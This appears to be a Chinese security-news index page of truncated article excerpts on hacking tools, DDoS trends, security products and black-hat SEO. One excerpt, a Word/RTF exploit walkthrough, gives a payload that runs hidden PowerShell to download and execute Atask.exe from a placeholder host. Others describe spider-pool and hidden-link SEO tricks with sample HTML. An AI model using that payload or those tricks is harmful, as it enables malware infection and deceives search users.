*本文原创作者：mooction，本文属FreeBuf原创奖励计划，未经许可禁止转载各种各样的黑客工具浩如天上繁星，这也让许多刚刚入门安全技术圈的童鞋感到眼花缭乱，本文整理了常用的安全技术工具，希望能够给你带来帮助。以下大部分工具可以在 GitHub 或 SourceForge 下载。Windows 调试工具通用调试器OllyDbg：经典的反汇编工具IDA pro：宇宙最强反汇编，支持源码级别的查看x64dbg：基于Qt的开源现代化的动态调试器Immunity Debugger：流行的用户模式调试器（依赖Python）配合 PyCommand 插件可构建 ROP 链。WinDbg：强大的用户态和内核态调试工具还有：SoftICE，HiewVB6WKTVBDebugger：强大的VB P-code专用调试器VBExplorer：国产的VB资源编辑器VBParser：国产的专业VB反编译器以及：Exdec，VBDEDelphiDeDe：开源的Delphi符号查看器.NETPEBrowserDbg：快速的.NET动态调试工具Reflector：最强.NET反编译器Strong Name Remove：强名称移除工具RE-Sign：强名称替换工具NET Unpacker：脱壳工具另外还有：9rays Spices .net，Dis#，Decompiler .net，Xenocode Fox ...继续阅读 (9)

Apache利用的是kaliaKali下2个路径web 路径 /var/www/htmlapace 配置文件路径 /etc/apache2/apache2.conf准备文件2个1：pocPOC的内容：poc=new ActiveXObject("WScript.Shell"); poc.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(/'http://ip_url/Atask.exe/', /'c:/windows/temp/Atask.exe/'); c:/windows/temp/Atask.exe', 0);window.close();2：word 文档随意 例如： a.docx一：KaLi 开启DAVa2enmod dav a2enmod dav_fs a2enmod dav_lock a2enmod headers service apache2 restart二：Kali服务器上操作mv a.docx /var/www/html/a.rtf三:本机电脑客户端操作新建word => 插入 => 对象 -> 文件名字 http://ip/a.rtf ...继续阅读 (14)

*本文原创作者：niro001，本文属FreeBuf原创奖励计划，未经许可禁止转载1 前言Antisamy是OWASP（open web application security project）的一个开源项目，其能够对用户输入的html/css/javascript 脚本进行过滤，确保输入满足规范，无法提交恶意脚本。Antisamy被应用在web服务中对存储型和反射性的xss防御，尤其是在存在富文本输入的场景，antisamy能够很好的解决用户输入体验和安全要求之间的冲突。Antisamy的对包含非法字符的用户输入的过滤依赖于策略文件，策略文件规定了antisamy对各个标签、属性的处理方法。策略文件定义的严格与否，决定了antisamy对xss漏洞的防御效果。OWASP中antisamy有java和.net两个项目，这篇文档中仅对java项目进行介绍。从安装、使用及策略文件的定制几个方面讲解如何将antisamy应用到实际项目当中。2 工具安装 Antisamy的官方下载路径:++https://code.google.com/archive/p/owaspantisamy/downloads++。下载列表中包含antisamy的jar包，同时也包含了几个常用的策略文件。官方下载的链接需要翻墙，为方便使用，将最新版本的antisamy和策略文件放到文档的附件中（见附件1）。An ...继续阅读 (12)

导语首次同时对外披露海内外数据，居安思危，思则有备，有备无患。说在发文前的话语感谢设计师 刘静雅的耐心修改；感谢设计师 吴茜、周登辉、王志平对本次设计图稿的悉心指导；感谢给予技术支撑的腾讯云大禹团队以及腾讯宙斯盾团队；这些幕后的力量是巨大的，新鲜内容奉上DDoSDDoS 事件海内外 TOP5世界知名黑客组织 Lizard Squad 与 Poodle Corp 对暴雪公司战网服务器发起 DDoS 攻击，包括《魔兽世界》、《守望先锋》在内的重要游戏作品离线宕机，玩家无法登陆。Anonymous(匿名者)、Ghost Squad Hackers(幽灵黑客小队)等黑客小组，针对全球范围内的多家银行网站，发动了 DDoS 攻击，导致约旦、韩国以及摩纳哥等央行网络系统陷入了半小时的瘫痪状态，而黑山国家银行网络系统则被迫关闭，停止服务。安全研究机构 KrebsonSecurity 遭遇 Mirai（Mirai 是一种利用物联网设备组建僵尸网络的 DDoS 攻击）攻击，不久之后，法国主机服务供应商 OVH 也遭到了两次攻击，罪魁祸首还是 Mirai。KrebsonSecurity 被攻击时流量达到了665Gbps，而 OVH 被攻击时峰值带宽则达到了1Tbps。美国半个互联网的瘫痪，这起事件缘由于提供动态 DNS 服务的 Dyn DNS 遭到了大规模 DDoS 攻击（据调查黑客操控感染了恶意软件 ...继续阅读 (12)

虽然博主并不认同黑帽seo手法，但是一些常见的黑帽手法还是需要了解的，增加自己对黑帽的认知，也可以在自己优化网站时适时的规避开这些黑帽手法，从而避免自己的网站被搜索引擎惩罚。好了，话不多说，下面进入今天的主题：10种常见的黑帽手法详解。1.关键词堆积这是老生常谈的问题，最常见的一种黑帽seo手法。在网站的内容中，我们讲究的是自然出现关键词，没必要出现时就不要出现，而有些人单纯的为了提升关键词的“密度”在文章中刻意并大量出现关键词，其引出的后果是语句不通顺，严重影响用户的阅读体验，导致被搜索引擎惩罚。常见的关键词堆积手法有：标题、描述中堆积关键词，网站首页头部和底部堆积关键词，文章内容中堆积关键词，关键词标签中(tag)堆积关键词，链接锚文本中堆积关键词，图片alt属性中堆积关键词等等。2.大量回链一个页面中出现多个链接向同一页面的锚文本，常见于网站首页底部，比如在首页的底部给首页的每个关键词都加一个锚文本，然后链接到首页，这就是回链。回链一旦超过2个，就很可能被认定为黑帽，从而被搜索引擎惩罚。3.购买单项链接有些老板不懂seo，会要求手底下的seo人员大量购买单项链接，多出现于向高权重网站购买链接，大量高权重网站都链接(单链)向自己的网站，搜索引擎一看就知道是购买的，发现之后，没有什么好说的，直接惩罚。所以，若是遇到这种老板，一定要说明其中的厉害关系。4.隐藏文本和隐藏链接从字面上 ...继续阅读 (19)

最近几个月以来，我们发现新型及大规模分布式拒绝服务(简称DDoS)攻击活动的出现频率愈发高。Mirai僵尸网络的恶劣影响Mirai僵尸网络正是其中的典型案例。其在最近几个月中曾涉及一系列DDoS攻击活动，其中包括去年10月针对DNS服务供应商Dyn的大规模袭击，导致美国东海岸出现大规模断网。该僵尸网络规模庞大，据称拥有高达30万台遭受入侵的物联网设备。如果黑客以栽种方式修改其源代码以将目前尚未使用的众多其它受感染设备纳入网络，其设备规模将进一步显著扩大。网络安全专家们预测，Mirai僵尸网络以及其它类似的恶意攻击实体将在2017年年内继续演进并变得愈发复杂。黑客技术一直在不断发展，攻击者会逐步调整现有僵尸网络以保证其适应新的DDoS攻击方法。据称，Mirai僵尸网络目前拥有可被黑客切实用于执行拒绝服务攻击的约10种不同的DDoS攻击技术。而随着时间的推移，相关攻击活动将大幅增加。企业巨头需要为更多DDoS攻击作好准备Mirai僵尸网络仅仅是众多案例中的一例。DDoS攻击的实施动机无穷无尽，而此类攻击的打击范围也涵盖政治与经济等多个领域。尽管以往的此类攻击往往以小型网站作为主要目标，但如今攻击者亦有可能破坏诸如BBC、Dyn以及Twitter等互联网巨头的大规模网站。我们的整体数字经济取决于互联网访问能力方可存在，因此企业应当在此类事件之后认真考虑自身的业务连续性保障工作。平均而言， ...继续阅读 (32)

本文作者：李勤，雷锋网(公众号：雷锋网)网络安全专栏作者。关于 DDoS 攻击，最近我们发现了几个会让老司机震惊的几个特点。打D不再是兼职攻击者再也不是兼职接单的“临时工”他们有组织，有预谋DDoS 成了一门生意这门生意还有高峰期和“淡水期”一年中的6-8月，是攻击者业务繁忙的日子一天中的11点-16点，17点-21点发起的攻击最多3点-7点攻击较少攻击高峰期通常也是互联网业务在线用户数量最多的时间段选在攻击目标业务使用高峰期发起攻击，往往会给被攻击目标带来巨大损失攻击者想用有限的资源达到对目标的更精准的打击使破坏力最大化太鸡贼攻击者也有大 boss大 boss 还要考虑投入产出比大流量攻击凶猛而短暂，百 G 以上的攻击大约5个小时就结束了小流量攻击持续不断，甚至可以持续数天2016 DDoS 短时攻击增加，在30分钟以内结束的占51.4%。你看，真的有人喜欢越快越好2016年，全球Top 3的DDoS攻击均为反射攻击（按攻击次数统计）依次为NTP、CHARGEN、SSDP反射，这三种反射攻击合计占比达 80%。老板拨了拨小算盘发现反射型攻击，隐蔽性高、成本低好，一拍脑袋很多老板选择了这种攻击方式合作搞起来如果自己能力不足， DDoS 攻击者会进行资源整合DDoS 攻击者常常利用木马，控制更大规模的僵尸网络14%的台风DDoS控制端位于云端主机上黑产者已经将DDoS 攻击平台化，任 ...继续阅读 (22)

从昨晚的18：50分开始，每隔30分钟左右进行10G流量的ddos攻击，实在没招，只能使用阿里云的高防IP来防御。主要的攻击是：趁此机会，全面了解DDos攻击： （以下是总结内容来源：http://www.secpulse.com/archives/37785.html?utm_source=tuicool&utm;_medium=referralhttp://www.ijiandao.com/safe/cto/15952.htmlDDoS（Distributed Denial of Service，分布式拒绝服务）攻击的主要目的是让指定目标无法提供正常服务，甚至从互联网上消失，是目前最强大、最难防御的攻击之一。这是一个世界级的难题并没有解决办法只能缓解.1、网络层DDoS分类SYN-FLOODSYN Flood是互联网上最经典的DDoS攻击方式之一，最早出现于1999年左右，雅虎是当时最著名的受害者。SYN Flood攻击利用了TCP三次握手的缺陷，能够以较小代价使目标服务器无法响应，且难以追查。 利用TCP建立连接时3次握手的“漏洞”，通过原始套接字发送源地址虚假的SYN报文，使目标主机永远无法完成3次握手，占满了系统的协议栈队列，资源得不到释放，进而拒绝服务，是互联网中最主要的DDOS攻击形式之一.标准的TCP三次握手过程如下：1、客户端发送一个包含SYN标志的TCP报文，S ...继续阅读 (13)

至顶网安全频道 04月26日 综合消息：据信息服务提供商Neustar介绍，2016年里分布式拒绝服务(Distributed Denial of Service，缩写DDoS)攻击的总体频率有增长趋势，部分原因是物联网僵尸网络。Neustar表示，与去年同期相比，Neustar在1 - 11月里减少了40％的DDoS攻击。Neustar发警告称，随着僵尸网络代码组件的发布，危险的新DDoS部署将陆续出现，例如持续设备注册部署，僵尸网络操控者利用这种部署即便在设备重启后仍然可以控制该设备。下面来看一看美国各地区、大学里由于物联网设备导致网络瘫痪的8大DDoS攻击事件。美国某大学遭DDoS攻击网络受影响达54小时之久安全公司Incapsula最近公布的资料显示，美国某大学在二月遭到分布式拒绝服务攻击，该大学的网络受连续影响达54小时之久。Incapsula日前披露了该次攻击的其他细节，并指攻击者似乎对易受攻击的设备善于在应用层上进行攻击。Incapsula发言人在一篇博文里称，“我们客户的分类系统根据许多特征因素（包括数据包报头的顺序、报头值和流量来源）立即发现攻击来自由Mirai驱动的僵尸网络。我们的研究表明，该僵尸网络用到的攻击设备中涵括了Mirai常用的设备，包括CCTV摄像机、DVR和路由器。DDoS攻击令Netflix、推特下线十月的一次DDoS攻击是通过物联网设备发起的， ...继续阅读 (14)

日前，全球领先的网络安全和应用交付解决方案提供商Radware (NASDAQ: RDWR)公司宣布，夏威夷电信公司(NASDAQ: HCOM)全新的云安全互联网防护服务中采用了Radware的实时分布式拒绝服务(DDoS)攻击缓解措施，用以保护企业客户和企业网络的安全。作为夏威夷的技术领导者，夏威夷电信公司为夏威夷人民和企业提供了光纤通信、信息和娱乐解决方案，同时也在不断寻求新的防御措施和改进功能，保护自身与银行、医院、政府机构、军事部门、学校等依靠其服务的机构的安全。Radware攻击缓解系统(AMS)可以保护夏威夷电信的客户免遭可能引发网络中断和应用服务降级的DDoS攻击的侵扰。该攻击缓解系统还可以缓解全网范围的多载体攻击，并清洗夏威夷群岛内部的大流量攻击，而不需要流量转发至本土。利用先进的行为分析技术，Radware AMS可以快速精确地缓解恶意流量，不会出现任何宕机。夏威夷电信公司业务销售及产品营销副总裁Paul Krueger表示：“我们的客户需要时时刻刻可以启动并正常运行的网络。Radware的行为分析技术可以智能地拦截恶意流量，清洗大流量攻击，其已被证实的灵活性和互操作性也是我们将其纳入到我们的解决方案中的主要原因。依靠夏威夷电信的安全互联网防护解决方案，我们的客户可以在当前不断发展的威胁现状中始终保持领先，并防护DDoS攻击。”Radware首席执行官Roy Zi ...继续阅读 (23)

5月2日，Shodan和Recorded Future联合推出在线恶意软件C&C;（命令和控制）服务器搜索引擎-Malware Hunter，该工具被集成在Shodan基础搜索引擎之上，可以极大方便广大安全研究人员进行相关恶意软件感染设备的探测发现。Malware Hunter技术支持Malware Hunter通过大量的搜索节点（bot）发现互联网上的僵尸主机。为了准确跟踪和确定C&C;服务器位置，搜索节点通过模仿或假装受恶意软件感染主机，向特定C&C;服务器发送多种预定义请求，如果对方作出有效响应，Malware Hunter就记录下其IP地址和其它相关信息，储存进入Shodan搜索库。Malware Hunter基于Shodan和Recorded Future的共同技术，其中，Shodan负责互联网IP地址快速高效的探测能力，而Recorded Future提供模仿受恶意软件感染的假冒主机技术。Recorded Future曾与Google和CIA共同开发互联网开源情报信息系统。关于Malware Hunter的更多技术，请参考Recorded Future15页技术报告《主动威胁识别过程发现远程访问木马的有效方式》。Malware Hunter识别能力广泛目前来说，Malware Hunter能识别和发现多种远控端（RAT），如Dark Comet、njRAT、Poison ...继续阅读 (15)

全新的全面管理服务扩展了云服务套件，可以为公有云提供商AWS和Azure提供完整的网络和应用层DDoS防护措施日前，全球领先的网络安全和应用交付解决方案提供商Radware® (NASDAQ: RDWR)公司通过推出业界首个全面管理DDoS防护服务扩展了云服务产品系列，该服务可以跨数据中心与Amazon Web Services (AWS)和Azure等公有云环境提供完整统一的防护措施。现在，该服务可用于托管在AWS中的应用，并将于2017年第二季度用于托管在Azure中的应用。Radware全新的云端DDoS服务为将应用托管在本地和公有云环境中的企业提供了可以实现一致安全策略和单一虚拟管理平台的统一的DDoS防护措施。这包括一个紧急响应团队和中心、一个统一的Web安全入口、单一报表工具以及跨本地和云端防护措施的单一DDoS防护技术。现有的面向公有云托管应用的DDoS防护服务的防护措施水平有限，这些服务关注的是网络层DDoS攻击，缺乏应用层攻击和基于SSL的DDoS攻击防护措施。Radware解决方案更进一步，可以防御更动态复杂的应用层和SSL DDoS攻击，提供广泛的攻击覆盖范围和相当高的防护精度。这也意味着企业将不再承担隐藏的流量成本，也无需在攻击流量到达云中的应用之前为之付出代价。Radware以永远在线或按需两种方式提供服务。在永远在线的云端DDoS防护服务中，应用 ...继续阅读 (17)

本文原创作者：bt0sea，本文属FreeBuf原创奖励计划，未经许可禁止转载行文初衷由于工作关系，最近接触了很多云上用户，对抗D产品做了一下用户调研，有些想法想和大家分享一下。首先，从数据分析角度上，看一下抗D安全业务需求，然后站在产品经理的角度上，从用户体验的五要素战略层、范围层、结构层、框架层、表现层方面深度解析市面的云厂商的抗D产品。最后，站在攻击者的角度上看看攻防双方博弈的手段。安全业务需求1、前言任何安全业务需求其实都源于其自身的需求，满足自己的安全需求后才能有对外输出能力。所以，有必要聊一下，云厂商为啥把抗D的需求做为云计算平台的首要安全需求。国内公有云大致分类：阵营厂商云基础服务&行业结局方案阿里云、腾讯云、UCloud、金山云等运营商云天翼云、大云、华为云（暂放）等IDC云世纪互联、网宿云、蓝汛云等应用云京东云、乐视云、美团云等备注：排名不分先后。现在国内主流提供公有云服务的厂商无论自研还是二道贩子加起来超过100家。这为安全业务提供了需求基础。2、DDoS数据解读我们从被DDoS行业和攻击次数趋势两个维度分析一下公有云厂商面临抗D需求，下图是某公有云厂商提供的2016Q4和2017Q1行业数据对比。解读：l针对游戏用户的攻击占比最多。l直播被DDoS次数成上升趋势。l针对公有云基础设施的攻击，一直不断，例如：CDN扫段DDoS攻击、DNS DDoS攻击等。lSa ...继续阅读 (21)

*本文原创作者：mx7krshell，本文属FreeBuf原创奖励计划，未经许可禁止转载*有些截图IP不统一是因为我有空的时候写有时不在同一个网络下所以分配的IP地址会不一样。接触这个挺长时间的如果时间长了不用会忘记第一次投稿求不喷。 哪里说错请指正,谢谢。文章太长，编辑中可能会有遗漏点。前言经常看到披露出来APT(Advanced Persistent Threat) 高级持续性威胁报告，据目前我所了解到的有常用两种攻击手法还有更多种手法水坑式攻击和鱼叉式钓鱼邮件攻击手法。其实我也想模仿这样攻击手法在渗透时候遇到有些目标简直是无从下手。很早之前就接触了Metasploit工具内网渗透非常强大，当时用过Cobalt Strike 2.0版本主要是结合Metasploit可以称为图形化MSF工具。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用。简介Cobalt Strike集成了端口转发、扫描多模式端口监听Windows exe木马，生成Windows dll(动态链接库)木马，生成java木马，生成office宏病毒，生成木马捆绑钓鱼攻击，包括站点克隆目标信息获取java执行浏览器自动攻击等等。360评价APT-TOCS攻击尽管看起来已经接近APT水准的攻击能力，但并非更多依赖攻击团队自身的能力，而是依托商业的自动化攻击测试平台来达 ...继续阅读 (25)

2017-04-25 11:51:42阅读：128次作者：聪明的狗子白帽与黑帽——来自企业安全主管的困惑辨善恶，分黑白，从来都不是一件简单的事。企业如何放心任用安全人员，又如何防止白帽员工变黑帽员工呢？安全客季刊发布的同时，安全客在知乎上发起了关于“白帽与黑帽”的提问，引发了安全从业者们的关注和讨论。截止2017年4月25日，该问题已有33次回答，440人关注，浏览量逾65000次。作为提问者，安全客整理了关于该问题知乎的精华问答，欢迎小伙伴们关注并参与讨论。余弦：确实是个难题确实是个难题，《投名状》这部电影结局都那样的凄凉，何况一家公司。补充两个方式来改进，如：必要的合同约束，具备法律威慑。入职时及日常的文化传导应该明确：什么是红线，因为合同等规则不是所有新入职的人都会认真在意。权限管理、日志管理等做好，真出什么问题了，至少可以及时溯源。云舒：给与能力对应的足够多的钱，谁愿意去做犯法要坐牢的事情？云舒大大的回答虽然只有一句话，但是以一个问题回答了另一个问题的方式吸引了很多小伙伴在评论下方进行互动，一起来看一下小伙伴们的讨论内容吧！陆羽：多少算够呢？企业永远给不起黑产给的利益，总的来说是一个收入平衡点的把握吧Lytton：同事离职去碰菠菜了，可能是想过的更好吧。龙元DragonCircle：谷歌竞价排名，排在前面的永远是卖假药的，因为假药利润永远比真药高。马宏菩：难讲，人的贪欲（不 ...继续阅读 (26)

工具简介WiFiPhisher是一款高度可定制的WiFi钓鱼攻击工具，它可以对具体的WiFI客户端进行攻击，例如获取用户凭证或感染恶意软件。与其他攻击不同的是，WiFiPhisher并不会进行爆破攻击，因为它主要使用的是社会工程学技术，而社工技术也是攻击者窃取用户凭证的一种简单且有效的方法。【官网链接】【工具下载】注：WiFiPhisher需要在KaliLinux系统上运行，使用开源GPL许可证。工作机制利用EvilTwin（双面恶魔）攻击实现了中间人攻击之后，WiFiPhisher会将目标用户所有的HTTP请求重定向至一个由攻击者控制的钓鱼页面。从用户的角度来看，这种攻击主要由以下三个阶段组成：1. 用户无法接入自己的无线网络接入点。因为WiFiPhisher会劫持目标范围内的所有无线网络接入点，并通过劫持请求数据包来阻止用户访问接入点。2. 用户会接入一个流氓热点。WiFiPhisher会扫描范围内的无线接入点，复制这些接入点的设置信息，然后利用这些配置来创建一个流氓热点，最后欺骗用户连接这个流氓热点。3. 用户会被重定向至一个高度定制化的钓鱼页面。WiFiPhisher会搭建一个小型的Web服务器，并响应用户的HTTP或HTTPS请求。当用户请求一个页面时，WiFiPhisher会用伪造的页面来响应用户的请求，并通过钓鱼页面来窃取用户凭证或传播恶意软件。需要 ...继续阅读 (21)

【PConline 杂谈】时至今日，黑客在互联网上已然发展成一个独特的群体。当然，‘黑客’只是一个统称，他们当中有男有女，存在着好坏之分，也就是我们常说的黑帽与白帽。尽管我们熟知黑客的行事风格，却仍旧难以在虚拟的网络世界中，捕捉到他们的行踪，加之其每次变幻莫测的攻击手法，提前防范更是难上加难。因此，我们才需要了解不同类型的黑客以及各自的行动动机，缩小目标保护易受攻击对象。只听说过黑帽和白帽?黑客的世界岂止这一点其实，‘黑客’一词早期在美国的电脑界是带有褒义的，泛指那些水平高超的电脑专家，程序设计人员。后来，因受到巨大金钱利益的驱使开始不断作恶，慢慢的就被黑化了。实际上，在这个行当中只有极少数是职业黑客，大多数是出于兴趣搞业余的。当中，更是不乏一些具有传奇色彩的大人物。例如有世界“头号电脑骇客”之称的Kevin Mitnick，历史上五大最著名的黑客之一的Adrian Lamo、Jonathan James，首位被以1986年电脑欺骗和滥用法案起诉的人Robert Tappan Morrisgeek，以及因攻击进入洛杉矶电台的KIIS-FM电话线而出名的Kevin Poulsen等等。至于他们的先进事迹，还请各位自行百度。言归正传，本文中我们对黑客类型进行了更细致的划分，下面就为大家逐一介绍。黑帽子黑帽黑客，也是我们常说的“黑客”或者“骇客”。受利益驱使，利用自身技术在网络上窃取他人 ...继续阅读 (17)

终于更新了！Kali官方近日正式宣布推出Kali Linux 2017.1滚动发行版，它带来了一系列令人兴奋的更新和功能。与所有新版本一样，您可以使用更新的软件，提供更多更好的硬件支持的更新的内核以及一系列更新的工具——同时这个版本还有一些惊喜。支持RTL8812AU无线网卡注入不久之前，我们收到了一个安装RTL8812AU无线芯片组的驱动程序的功能请求。这些驱动程序不是标准Linux内核的一部分，并且已被修改为允许注入。为什么这很重要呢？该芯片组支持802.11 AC，使得它成为第一批能进行注入相关的无线攻击的驱动之一，而像ALFA这样的公司制造 AWUS036ACH无线网卡，我们预计这张卡将成为武器库的最爱。可以使用以下命令安装驱动程序：apt-get update apt install realtek-rtl88xxau-dkms简化支持CUDA GPU Crack安装专有图形驱动程序一直是Kali的沮丧之源。幸运的是，打包过程的改进使得这个过程无缝——我们的用户在GPU破解的过程中获得了流线型的体验。通过搭配支持的硬件，像Hashcat和Pyrit这样的工具可以充分利用Kali内的NVIDIA GPU。有关此新功能的更多信息，请查看相关博客文章和更新的官方文档。Amazon AWS和Microsoft Azure可用性（GPU支持）由于基于云进行密码破解的日益普及，我们决 ...继续阅读 (17)

为什么黑帽黑客总是在安全技术领域领先于IT安全专家？这是一个值得我们深思的问题。那么，作为那些企业组织他们应该如何思考和解决这个问题呢？下面我将从这个角度，带大家深入探讨这个问题。美国智库战略与国际研究中心（CSIS）和英特尔安全集团（前身为McAfee）联合发布了一份最新报告：失衡的竞争：不协调的奖励机制如何对抗网络安全（PDF）。在调查了近800名网络安全的专业人员后，我们得出的结论认为，激励机制的严重失调是导致网络犯罪分子占据巨大优势的重要因素。例如：结构化的公司官僚机构，无法做出足够快的反应，以跟上自由流动的犯罪集团；网络安全计划的战略和实施之间存在着分歧；对高级管理人员和管理网络安全计划的不对等奖励机制。该报告详细说明了，为什么一个好的激励机制，能给予网络罪犯巨大的优势。此外报告还深入研究了，为什么网络罪犯已经超越了传统的企业网络安全等相关问题。视频：http://www.techrepublic.com/videos/video-blackberry-qnx/黑帽黑客的劳动力正在蓬勃发展该报告的作者指出，与那些企业组织难以找到合格的网络安全专业人员不同，网络罪犯们并不纠结于这个问题。“黑帽黑客们早已规划了基于市场的激励机制，而不是禁锢于企业组织内的条条框框”。此外，地下经济在产品方面也有优势。“黑帽黑客的生态系统，基于市场经济不断的促进和创新，且能快速适应市场的变化，并 ...继续阅读 (17)

* 原创作者：ArkTeam/XHJ，本文属FreeBuf原创奖励计划，未经许可禁止转载 一 相关背景网络爬虫(Web Spider)又称网络蜘蛛、网络机器人，是一段用来自动化采集网站数据的程序。如果把互联网比喻成一个蜘蛛网，那么Spider就是在网上爬来爬去的蜘蛛。网络爬虫不仅能够为搜索引擎采集网络信息，而且还可以作为定向信息采集器，定向采集某些网站下的特定信息，如：汽车票价，招聘信息，租房信息，微博评论等。二 应用场景图1 应用场景爬虫技术在科学研究、Web安全、产品研发、舆情监控等领域可以做很多事情。如：在数据挖掘、机器学习、图像处理等科学研究领域，如果没有数据，则可以通过爬虫从网上抓取；在Web安全方面，使用爬虫可以对网站是否存在某一漏洞进行批量验证、利用；在产品研发方面，可以采集各个商城物品价格，为用户提供市场最低价；在舆情监控方面，可以抓取、分析新浪微博的数据，从而识别出某用户是否为水军。三 本文目的本文简要介绍对于定向信息采集所需了解基本知识和相关技术，以及python中与此相关的库。同时提供对与数据抓取有关库的封装实现，目的是减少不必要的配置，便于使用，目前仅包含对urllib2, requests, mechanize的封装。地址：https://github.com/xinhaojing/Crawler四 运行流程对于定向信息的爬取，爬虫主要包括数据抓取、数据解 ...继续阅读 (26)

先看图 看到有什么特点了吗?1：站点标题都是带有虚假百度知道类关键字，让访客信以为真2：核心业务词+联系方式直接存在于标题描述中3：众多网站域名实现百度首页霸屏再看一张图 解密黑帽SEO蜘蛛池 实现搜索引擎霸屏又有什么特点呢?1:百度新闻框第一条和第二条都是属于中华网等大中型高权重媒体站2:也是标题直接带有业务核心词+联系方式3:实际点开网站都是正常的网页，并不包含这些推广词这种情况被称作什么?其实这就是黑帽SEO蜘蛛池操作手法，黑帽SEO是相对于白帽SEO而言，简单来说就是钻搜索引擎的空子，通过作弊的手段迅速使网站收录并快速排名上首页。有很多黑帽SEO方法，比如隐藏关键字、隐藏网页、堆砌关键字、桥页、寄生虫等，以及咱们今天说的这个蜘蛛池。什么是蜘蛛池：简单来说就是利用大量的垃圾域名站群塞上未收录的网站链接，进而吸引蜘蛛快速收录。所以蜘蛛池的核心无非就是开多IP的服务器，同时挂上数量众多的垃圾域名，之前的泛域名站群就是这样操作，域名+空间都有了，剩下的无非就是程序内容，靠CMS采集系统做好采集规则大批量的抓取一些新闻站点，只要有内容被收录即可，就养着这些站群。搜索引擎霸屏如何实现?要实现上诉截图的案例只需要做到以下四步一：先拓展你的核心词，找出与你业务相关的所有词，越多越好，可以地域+业务词，也可以加上联系方式。二：找到一批大中型站点，比如上面的第二图，前提是这些站点必须是未禁止动 ...继续阅读 (38)

什么是蜘蛛池？蜘蛛池是一种通过利用大型平台权重来获得百度收录以及排名的一种程序，程序员常称为“蜘蛛池”。这是一种可以快速提升网站排名的一种程序，值得一提的是，它是自动提升网站的排名和网站的收录，这个效果是非常出众的。蜘蛛池程序可以帮助我们做什么？发了外链了帖子还不收录，可竞争对手人家一样是发同样的站，人家没发外链也收录了，是吧！答:（因为人家养有了数量庞大的百度收录蜘蛛爬虫，有了蜘蛛池你也可以做到）有些老鸟会说，我自己也养有百度蜘蛛怎么我的也不收录呢？答：（因为你的百度收录蜘蛛不够多，不够广，来来回回都是那些低质量的百度收录爬虫，收录慢，而且甚至是根本不收录了！——-蜘蛛池拥有多服务器，多域名，正规内容站点养着百度收录蜘蛛，分布广，域名多，团队化养着蜘蛛，来源站点多，质量高，每天都有新来的蜘蛛进行爬取收录您的外推帖子）蜘蛛池的优势？1、 蜘蛛池可以全自动帮助您圈养搜索引擎的蜘蛛，可以帮助您的网站加快收录等，一个网站没有收录等于一个死站，所以做网站的蜘蛛是必备之一！2、若您的网站遇到被K，进沙盒，降权等，蜘蛛池就能帮助您恢复您的网站，并且能让您的网站加快收录、3、在您圈养蜘蛛的同时，您的蜘蛛池也会有相应的内页被搜索引擎收录，因为池子里面有大量的蜘蛛在不断的爬行，池子里的关键词也会逐渐有排名，从而达到全自动引真实流量的效果，老鸟都懂、4、选择做站群不如选择做蜘蛛池，因为蜘蛛池有圈养和引 ...继续阅读 (16)

威胁情报公司 Recorded Future 披露，一名说俄语的黑帽子黑客，入侵了超过60所大学和美国政府机构的系统。该黑客被 Recorded Future 命名为“Rasputin”，通常利用SQL注入漏洞获取敏感信息，在网络犯罪市场上出售。Rasputin去年入侵了美国选举协助委员会电脑，尝试售卖100多个访问凭证，包括有管理员权限的那些。研究人员发现，他曾与代表中东政府的潜在买家协商。Recorded Future 一直在监视该黑客的活动，识别出了很多他的受害者，包括20多所美国大学，10所英国大学，以及很多美国政府机构。目标政府机构列表包括了地方、州和联邦组织。目标联邦机构是邮政监管委员会、美国住房和城市发展部、卫生资源和服务管理局、国家海洋和大气管理局。查找和利用SQL注入漏洞的免费工具很多，包括Havij、Ashiyane SQL Scanner、SQL Exploiter Pro、SQLI Hunter、SQL Inject Me、SQLmap和SQLSentinel。但Rasputin一直使用的是他自己开发的SQL注入工具。Recorded Future 情报与策略副总裁李维·甘德特称：“经济利益驱动着Rasputin这样的黑客，他们有技术创建自己的工具，在发现和利用脆弱数据库上远超竞争对手。”专家认为，Rasputin是基于安全控制投入和所盗数据潜 ...继续阅读 (20)

在上一节，我们完成了编写一个简易的Sniffer的第一步——数据捕获。很多时候，我们需要将捕获的数据先保存到磁盘上，之后再使用工具或者自己编写代码来进行详细分析。本节我们在上一节的基础上来讲解保存捕获数据的方式，当然使用tcpdump或者WireShark都可以很方便的存储数据包。4.2.1 使用pcapy保存和读取数据前文我们使用 pcapy的open_live方法，可以获取pcapy的一个实例对象，通过该对象的dump_open方法可以获取一个dump对象，通过dump对象可以保存数据包到本地磁盘。示例如下：#!/usr/bin/python import pcapy dev = "eth0" filter = "tcp and port 80" def save_packet(hdr, data): dumper.dump(hdr, data) pcap = pcapy.open_live(dev, 1500, 0, 100) dumper = pcap.dump_open('sniffer.pcap') pcap.setfilter(filter) pcap.loop(0, save_packet)上面的代码中，我们首先通过dump_open方法获取dumper对象，随后在循环捕获数据的时候调用save_packet方法，该方法中调用dump方法将数据保存到 ...继续阅读 (16)

Kali Linux工具文档翻译计划Kali Tools Translate Volunteers是一个公益项目，简称KTTV，目标是将http://tools.kali.org/tools-listing的所有说明文档汉化。也许你是：技术狂人安全健将英语达人管理能手哪怕你没有强大的渗透技术，我们也能一起创造历史。加入项目，你将从中得到：良好的团队协作能力五湖四海的朋友一场有意义的经历一些预料不到的惊喜来吧，不妨让情怀挥洒一次，因为你我的努力将降低更多人接触Kali的门槛，为网络安全做出自己的贡献。项目地址：kalitools.github.ioQQ群：146478946 ...继续阅读 (14)

暗链也称为黑链，即隐蔽链接 hidden links，是黑帽SEO的作弊手法之一。在早期的SEO优化中，黑链是最有效最迅速的方法之一；但是现在百度算法已经对iframe和display:none 等直接进行了打击，如果你对代码没有任何处理的话，那么你所做的外链将全部降权。因此，目前黑帽SEO技术中，暗链已经用得不多，但还是有必要了解下这个经典的作弊手法。挂暗链的目的很简单，增加网站外链，提高网站排名；实现方式主要分为几种：利用CSS实现、利用JS实现、利用DIV+JS实现，其他高级手法。利用CSS实现挂暗链display属性将display属性设置为none，则页面上不显示此内容。<div style="display:none;"> <a href=http://thief.one/ >暗链</a> </div>分析：这种形式以前效果较好，现在不建议使用，易被搜索引擎察觉。color/font-size/line-height属性将color颜色设置与页面背景色一样，大小设置为小于或等于1。<a href=http://thief.one style="color:#FFFFFF;font-size:1px;line-height:1px 